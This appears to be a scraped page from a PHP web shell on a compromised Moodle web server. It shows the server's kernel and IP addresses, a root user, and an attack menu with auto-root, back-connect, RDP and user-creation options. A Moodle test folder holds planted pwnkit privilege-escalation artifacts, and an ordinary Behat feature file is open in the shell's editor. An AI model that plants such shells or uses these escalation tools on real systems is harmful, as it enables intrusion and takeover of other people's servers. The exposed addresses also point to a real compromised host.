Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
editor /
atto /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
autosave.feature
4.04
KB
-rwxrwxrwx
behat_editor_atto.php
3.67
KB
-rwxrwxrwx
clean.feature
3.75
KB
-rwxrwxrwx
customtoolbar.feature
1.44
KB
-rwxrwxrwx
direction.feature
1.97
KB
-rwxrwxrwx
disablecontrol.feature
3.03
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : direction.feature
@editor @editor_atto @atto Feature: Add text direction and alignment In order to generate a content that can be displayed in the proper direction to everyone As a user I should see the Atto editor with explicit direction and alignment being set Background: Given the following "user preferences" exist: | user | preference | value | | admin | htmleditor | atto | And I log in as "admin" And I navigate to "Plugins > Text editors > Atto HTML editor > Atto toolbar settings" in site administration And I set the field "Toolbar config" to multiline: """ collapse = collapse style1 = title, bold, italic list = unorderedlist, orderedlist links = link files = image, media, recordrtc, managefiles, h5p style2 = underline, strike, subscript, superscript align = align,rtl indent = indent insert = equation, charmap, table, clear undo = undo accessibility = accessibilitychecker, accessibilityhelper other = html """ And I press "Save changes" And I log out @javascript Scenario Outline: Atto should apply user's direction and alignment by default Given the following "courses" exist: | fullname | shortname | summary | summaryformat | | Course 1 | C1 | | 1 | And the following "language customisations" exist: | component | stringid | value | | <component> | <stringid> | <localstring> | And I log in as "admin" And I am on "Course 1" course homepage When I navigate to "Edit settings" in current page administration And I press "Show more buttons" And I press "HTML" Then I should see "<partialtext>" Examples: | component | stringid | localstring | partialtext | | core_langconfig | thisdirection | ltr | dir=\"ltr\" style=\"text-align: left;\" | | core_langconfig | thisdirection | rtl | dir=\"rtl\" style=\"text-align: right;\" |
Close